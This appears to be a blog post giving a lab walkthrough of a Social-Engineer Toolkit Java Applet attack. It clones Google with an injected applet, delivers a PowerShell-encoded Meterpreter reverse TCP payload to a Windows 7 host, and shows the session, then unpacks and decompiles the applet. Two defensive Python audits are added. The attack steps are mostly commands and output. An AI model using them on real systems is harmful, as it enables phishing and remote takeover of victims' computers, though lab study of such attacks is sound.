
Java Applet Attack using setoolkit

category Security/Information Gathering 2017. 11. 12. 16:05

- Systems used

Kali Linux

Windows 7


- Hands-on exercise


(kali)

# setoolkit

  Select from the menu:

   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set>  1

Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) SMS Spoofing Attack Vector
  11) Third Party Modules

  99) Return back to the main menu.

set> 2

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Web Jacking Attack Method
   6) Multi-Attack Web Method
   7) Full Screen Attack Method
   8) HTA Attack Method

  99) Return to Main Menu

set:webattack>1

   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

set:webattack>1
[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: no
set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.17.50]: 192.168.27.50

[-------------------------------------------]
Java Applet Configuration Options Below
[-------------------------------------------]
Next we need to specify whether you will use your own self generated java applet, built in applet, or your own code signed java applet. In this section, you have all three options available. The first will create a self-signed certificate if you have the java jdk installed. The second option will use the one built into SET, and the third will allow you to import your own java applet OR code sign the one built into SET if you have a certificate.
Select which option you want:
1. Make my own self-signed certificate applet.
2. Use the applet built into SET.
3. I have my own code signing certificate or applet.

Enter the number you want to use [1-3]: 2
[*] Okay! Using the one built into SET - be careful, self signed isn't accepted in newer versions of Java :(

  1. Java Required
  2. Google
  3. Facebook
  4. Twitter
  5. Yahoo

set:webattack> Select a template:2

[*] Cloning the website: http://www.google.com
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: gwCRFVtkWe
[*] Malicious java applet website prepped for deployment


What payload do you want to generate:

  Name:                                       Description:

   1) Meterpreter Memory Injection (DEFAULT)  This will drop a meterpreter payload through powershell injection
   2) Meterpreter Multi-Memory Injection      This will drop multiple Metasploit payloads via powershell injection
   3) SE Toolkit Interactive Shell            Custom interactive reverse toolkit designed for SET
   4) SE Toolkit HTTP Reverse Shell           Purely native HTTP shell with AES encryption support
   5) RATTE HTTP Tunneling Payload            Security bypass payload that will tunnel all comms over HTTP
   6) ShellCodeExec Alphanum Shellcode        This will drop a meterpreter payload through shellcodeexec
   7) Import your own executable              Specify a path for your own executable
   8) Import your own commands.txt            Specify payloads to be sent via command line

set:payloads> 1
set:payloads> PORT of the listener [443]: <enter>

Select the payload you want to deliver via shellcode injection

   1) Windows Meterpreter Reverse TCP
   2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
   3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager
   4) Windows Meterpreter (ALL PORTS) Reverse TCP

set:payloads> Enter the number for the payload [meterpreter_reverse_https]:1
[*] Prepping pyInjector for delivery..
[*] Prepping website for pyInjector shellcode injection..
[*] Base64 encoding shellcode and prepping for delivery..
[*] Multi/Pyinjection was specified. Overriding config options.
[*] Generating x86-based powershell injection code...
[*] Finished generating powershell injection bypass.
[*] Encoded to bypass execution restriction policy...

***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************

[--] Tested on Windows, Linux, and OSX [--]
[*] Moving payload into cloned website.
[*] The site has been moved. SET Web Server is now listening..
[-] Launching MSF Listener...
[-] This may take a few to load MSF...

       =[ metasploit v4.14.10-dev                         ]
+ -- --=[ 1639 exploits - 944 auxiliary - 289 post        ]
+ -- --=[ 472 payloads - 40 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*] Processing /root/.set//meta_config for ERB directives.
resource (/root/.set//meta_config)> use exploit/multi/handler
resource (/root/.set//meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set//meta_config)> set LHOST 192.168.27.50
LHOST => 192.168.27.50
resource (/root/.set//meta_config)> set LPORT 443
LPORT => 443
resource (/root/.set//meta_config)> set EnableStageEncoding false
EnableStageEncoding => false
resource (/root/.set//meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set//meta_config)> exploit -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.27.50:443 
[*] Starting the payload handler...
msf exploit(handler) > 

> Once the configuration is done, msfconsole is started automatically.


(win7)

Download Java from http://java.com/ko.

Start > All Programs > Java > Configure Java > "Security" > [ V ] High

Edit Site List > Add > "http://192.168.27.50" "https://192.168.27.50"

Use Internet Explorer.

Tools > Internet Options

Once the settings are done, open http://192.168.27.50 in the browser.
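The "Edit Site List > Add" step above is what lets the self-signed applet run at all, so a defender's first check on a workstation is the Exception Site List itself. The following Python is an added example (not part of the original post): it audits that list, assumed on Windows to be stored at %USERPROFILE%\AppData\LocalLow\Sun\Java\Deployment\security\exception.sites with one URL per line, and flags entries that use plain http, an IP-literal host, or a bare host with no application path. The sample entries are constructed to match the post.

```python
import ipaddress
from urllib.parse import urlsplit

# Added example, not code from the post. The Exception Site List is assumed to be
# one URL per line (Windows path: %USERPROFILE%\AppData\LocalLow\Sun\Java\
# Deployment\security\exception.sites). These entries are constructed for the demo.
SAMPLE_EXCEPTION_SITES = """\
http://192.168.27.50
https://192.168.27.50
https://intranet.example.com/apps/
"""

def audit_entry(entry: str) -> list:
    """Return the reasons one exception-site entry weakens the applet sandbox."""
    reasons = []
    parts = urlsplit(entry)
    if parts.scheme == "http":
        reasons.append("plain http: no transport integrity for the page or the applet")
    try:
        ipaddress.ip_address(parts.hostname or "")
        reasons.append("IP-literal host: no DNS name tied to an owner")
    except ValueError:
        pass  # hostname is a DNS name, not an address
    if parts.path in ("", "/"):
        reasons.append("bare host: everything on the host is exempted, not one app path")
    return reasons

def audit_exception_sites(text: str) -> dict:
    """Map each non-empty line to its findings; an empty list means nothing flagged."""
    findings = {}
    for line in text.splitlines():
        entry = line.strip()
        if entry:
            findings[entry] = audit_entry(entry)
    return findings

if __name__ == "__main__":
    for entry, reasons in audit_exception_sites(SAMPLE_EXCEPTION_SITES).items():
        print(entry, "->", reasons or ["ok"])
```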


(kali)


[*] Sending stage (957487 bytes) to 192.168.27.202

[*] Meterpreter session 1 opened (192.168.27.50:443 -> 192.168.27.202:50056) at 2017-11-12 15:48:23 +0900


msf exploit(handler) > sessions


Active sessions
===============

  Id  Type                     Information                                     Connection
  --  ----                     -----------                                     ----------
  1   meterpreter x86/windows  adminstrator-PC\adminstrator @ ADMINSTRATOR-PC  192.168.27.50:443 -> 192.168.27.202:50056 (192.168.27.202)


msf exploit(handler) > sessions -i 1

[*] Starting interaction with 1...


meterpreter > sysinfo
Computer        : ADMINSTRATOR-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : ko_KR
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > quit
[*] Shutting down Meterpreter...

[*] 192.168.27.202 - Meterpreter session 1 closed.  Reason: User exit


# cd /root/.set

# ls

attack_vector   metasploit.payload         msf.exe                    site.template  x86.powershell
jxacLZcCuN.jar  meterpreter.alpha          payload_options.shellcode  version.lock
meta_config     meterpreter.alpha_decoded  set.options                web_clone


# file jxacLZcCuN.jar

jxacLZcCuN.jar: Zip archive data, at least v2.0 to extract


[Note] jar commands

# jar cvf    (c: create an archive)

# jar tvf    (t: list the table of contents)

# jar xvf    (x: extract)


# jar tvf jxacLZcCuN.jar

   244 Mon Jul 10 18:34:12 KST 2017 META-INF/MANIFEST.MF
   313 Mon Jul 10 18:34:12 KST 2017 META-INF/DUMRFQDR.SF
  1110 Mon Jul 10 18:34:12 KST 2017 META-INF/DUMRFQDR.DSA
  5020 Mon Jul 10 18:31:52 KST 2017 Java.class


# jar xvf jxacLZcCuN.jar

# ls

Java.class     jxacLZcCuN.jar      meterpreter.alpha          payload_options.shellcode  version.lock
META-INF       meta_config         meterpreter.alpha_decoded  set.options                web_clone
attack_vector  metasploit.payload  msf.exe                    site.template              x86.powershell


# jad Java.class    /* the file is compiled, so it cannot be read as-is; it has to be decompiled first. */

Parsing Java.class...The class file version is 52.0 (only 45.3, 46.0 and 47.0 are supported)
Generating Java.jad
Couldn't fully decompile method init
Couldn't resolve all exception handlers in method init
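To make the `jar tvf` listing and the jad version error concrete, here is an added Python example (not from the post or from SET) that triages a JAR without running it: it lists the entries, flags the META-INF signature files that mark a signed (here self-signed) applet, and reads each class file's major version, which explains why jad 1.5.8e, which stops at class version 47.0, cannot decompile a version 52.0 (Java 8) class. The JAR it inspects is constructed in memory with dummy contents; only the entry names mirror the post's listing.

```python
import io
import struct
import zipfile
from typing import Optional

# Added example, not code from the post or from SET. Entry names mirror the
# post's `jar tvf` listing; the contents are dummies constructed below.
SIGNATURE_SUFFIXES = (".SF", ".DSA", ".RSA", ".EC")
JAD_MAX_MAJOR = 47  # jad 1.5.8e: "only 45.3, 46.0 and 47.0 are supported"

def class_major_version(data: bytes) -> Optional[int]:
    """Major version from the class-file header (52 = Java 8); None if not a class file."""
    if len(data) < 8 or data[:4] != b"\xca\xfe\xba\xbe":
        return None
    _minor, major = struct.unpack(">HH", data[4:8])
    return major

def triage_jar(jar_bytes: bytes) -> dict:
    """List entries, note signature blocks (a signed applet) and each class's version."""
    report = {"entries": [], "signature_files": [], "classes": {}}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        for info in zf.infolist():
            report["entries"].append(info.filename)
            upper = info.filename.upper()
            if upper.startswith("META-INF/") and upper.endswith(SIGNATURE_SUFFIXES):
                report["signature_files"].append(info.filename)
            elif upper.endswith(".CLASS"):
                report["classes"][info.filename] = class_major_version(zf.read(info))
    report["signed"] = bool(report["signature_files"])
    # jad can only decompile the JAR if no class is newer than class version 47
    versions = report["classes"].values()
    report["jad_decompilable"] = all(v is not None and v <= JAD_MAX_MAJOR for v in versions)
    return report

def build_sample_jar() -> bytes:
    """Constructed sample JAR with the same entry names as the post's listing."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("META-INF/DUMRFQDR.SF", "Signature-Version: 1.0\n")
        zf.writestr("META-INF/DUMRFQDR.DSA", b"\x30\x82\x00\x00")  # dummy DER bytes
        # 0xCAFEBABE magic, minor 0, major 52 (Java 8), then padding
        zf.writestr("Java.class", b"\xca\xfe\xba\xbe\x00\x00\x00\x34" + b"\x00" * 8)
    return buf.getvalue()

if __name__ == "__main__":
    for key, value in triage_jar(build_sample_jar()).items():
        print(f"{key}: {value}")
```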


 


# ls

Java.class  attack_vector   metasploit.payload         msf.exe                    site.template  x86.powershell
Java.jad    jxacLZcCuN.jar  meterpreter.alpha          payload_options.shellcode  version.lock
META-INF    meta_config     meterpreter.alpha_decoded  set.options                web_clone


# vi Java.jad

// Decompiled by Jad v1.5.8e. Copyright 2001 Pavel Kouznetsov.
// Jad home page: http://www.geocities.com/kpdus/jad.html
// Decompiler options: packimports(3)

import java.applet.Applet;
import java.applet.AppletContext;
import java.io.*;
import java.net.URL;
import java.net.URLConnection;
import java.util.Random;
import sun.misc.BASE64Decoder;

public class Java extends Applet
{

    public Java()
    {
    }

    public void init()
    {
        Object obj;
        Object obj1;
        String s1;
        String s2;
        Object obj2;
        String s8;

..... (omitted) ...

> The Java source can now be read.
